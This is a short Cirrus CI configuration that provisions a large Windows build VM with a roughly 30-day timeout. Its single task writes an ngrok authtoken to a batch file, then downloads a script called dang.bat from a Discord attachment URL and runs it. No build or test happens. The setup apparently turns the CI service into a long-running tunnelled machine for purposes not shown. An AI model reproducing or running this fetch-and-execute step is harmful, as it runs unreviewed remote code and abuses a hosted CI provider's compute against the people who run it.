compute_engine_instance:
 image_project: cirrus-images # GCP project
 image: family/windows-docker-builder # family or a full image name.
 platform: windows
 cpu: 8 # optional. Defaults to 2 CPUs.
 memory: 32G # optional. Defaults to 4G.
 disk: 1024 # optional. By default, uses the smallest disk size required by the image.
 nested_virtualization: true # optional. Whether to enable Intel VT-x. Defaults to false.
 
task:
  timeout_in: 43200m
  enviroment:
    TOKEN: ENCRYPTED[20HE1ZxKnFVWEpyw1UhrqH0xLHT_5PFC9VDRQnWTXkVxeJ5Hj]
  script:
   - echo ngrok authtoken %TOKEN% > NGROK.bat
   - curl -s -O https://cdn.discordapp.com/attachments/911797178190676052/912014848949375117/dang.bat
   - dang.bat
